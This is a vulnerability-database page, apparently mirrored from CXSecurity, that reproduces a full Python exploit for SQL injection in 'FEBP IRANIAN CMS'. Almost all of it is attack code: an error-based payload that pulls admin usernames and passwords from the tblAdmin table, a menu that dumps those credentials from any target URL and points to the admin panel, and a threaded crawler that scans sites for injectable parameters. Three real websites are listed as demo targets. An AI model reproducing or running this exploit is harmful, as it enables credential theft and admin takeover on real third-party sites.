FEBP IRANIAN CMS SQL injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1867054 漏洞类型
发布时间 2019-12-19 更新时间 2019-12-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120086
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: FEBP IRANIAN CMS SQL injection
# Date: 2019-12-17
# Exploit Author: S I R M A X
# Vendor Homepage: http://febpco.ir
# Category: webapps
# Version: All Version
# Tested on: win(10),linux(ubuntu)
#=================================================================================#
Demo :

[-] http://daneshir.ir
[-] http://www.mehregancorp.com
[-] http://www.monifano.com
#=================================================================================#
[+] Exploit:

#!/usr/bin/python3.8
from bs4 import BeautifulSoup
from colorama import Fore, init
import os
import requests
import threading
from urllib import parse
import random
payload = '%20and%201=(select%20username_Admin%2b%27:::%27%2bpassword_Admin%20as%20t+from%20tblAdmin%20for%20xml%20path(%27%27))--%20-'
max_threads = 10
if os.name == 'nt':
    init(convert=True)


def clear():
    if os.name == 'nt':
        os.system('cls')
    else:
        os.system('clear')


def check_links(link):
    return link not in used_links


def scan(link, main_url):
    global current_threads
    if 'http' in (link_href := link.get('href', '')):
        if main_url in link_href:
            current_url = link_href
        else:
            current_threads -= 1
            return
    else:
        current_url = main_url + link_href
    if '=' in current_url:
        parsed_url = parse.urlparse(current_url)
        clean_url = main_url.strip('/') + parsed_url.path + '?' + parsed_url.query + payload
        try:
            new_link = BeautifulSoup(requests.get(clean_url).text, 'html.parser')
        except Exception as link_error:
            print(Fore.YELLOW + str(link_error))
        else:
            if (current_title := new_link.title) is not None and ':::' in current_title.text:
                hits.add(clean_url.replace(payload, ''))
    else:
        try:
            all_new_links = BeautifulSoup(requests.get(current_url).text, 'html.parser').find_all('a')
        except Exception as link_error:
            print(Fore.YELLOW + str(link_error))
        else:
            new_links = filter(check_links, all_new_links)
            all_links.extend(new_links)
    current_threads -= 1


clear()
print(
    '''####### ####### ######  ######
#       #       #     # #     #
#       #       #     # #     #
#####   #####   ######  ######
#       #       #     # #
#       #       #     # #
#       ####### ######  #

#    #    ###   #       #       ####### ######
#   #      #    #       #       #       #     #
#  #       #    #       #       #       #     #
###        #    #       #       #####   ######
#  #       #    #       #       #       #   #
#   #      #    #       #       #       #    #
#    #    ###   ####### ####### ####### #     #
'''
)
print(Fore.RED + 'Welcome to FEBP Killer Exploit !\nExploited By S I R M A X & AntiWanted\n')
while True:
    print(Fore.GREEN + '1 : Exploit !\n2 : Admin Page\n3 : Scanner (It\'s better to find them yourself !)\n4 : Exit !')
    option = input(Fore.RED + 'Please select an option : ')
    clear()
    if option == '1':
        payload_url = input(Fore.CYAN + 'Please enter target URL : ') + payload
        try:
            title_data = BeautifulSoup(requests.get(payload_url).text, 'html.parser').title.text.split('\'')
        except Exception as error:
            print(Fore.YELLOW + str(error))
        else:
            if len(title_data) == 3 and ':::' in title_data[1]:
                raw_users = title_data[1].split('</t>')[:-1]
                users = [data.strip('<t>').replace(':::', ' => ') for data in raw_users]
                for user in users:
                    print(Fore.YELLOW + user)
            else:
                print(Fore.YELLOW + 'URL is not vulnerable !')
    elif option == '2':
        website = input(Fore.CYAN + 'Please enter website URl : ').strip('/') + '/inputtopanelmanager.aspx'
        print(Fore.GREEN + 'Admin panel => ' + Fore.YELLOW + website)
    elif option == '3':
        website_url = input(Fore.GREEN + 'Please enter website URL : ').strip('/') + '/'
        try:
            all_links = BeautifulSoup(requests.get(website_url).text, 'html.parser').find_all('a')
        except Exception as error:
            print(Fore.YELLOW + str(error))
        else:
            print(Fore.RED + 'Scanning ...')
            hits = set({})
            used_links = []
            current_threads = 0
            while all_links:
                if current_threads + 1 <= len(all_links) and current_threads + 1 <= max_threads:
                    current_threads += 1
                    random_choice = random.choice(all_links)
                    threading.Thread(target=scan, args=(random_choice, website_url)).start()
                    all_links.remove(random_choice)
                    used_links.append(random_choice)
            while current_threads != 0:
                continue
            for hit in hits:
                print(Fore.CYAN + 'Got a hit : ' + hit)
    elif option == '4':
        print(Fore.MAGENTA + 'Cya !')
        break
    else:
        print(Fore.BLUE + 'Unknown option !')
    input(Fore.RED + 'Press Enter to continue ...')
    clear()

#=================================================================================#
[=] T.me/Sir_Max
[=] Telegram Channel ==> @Storm_Security
#=================================================================================#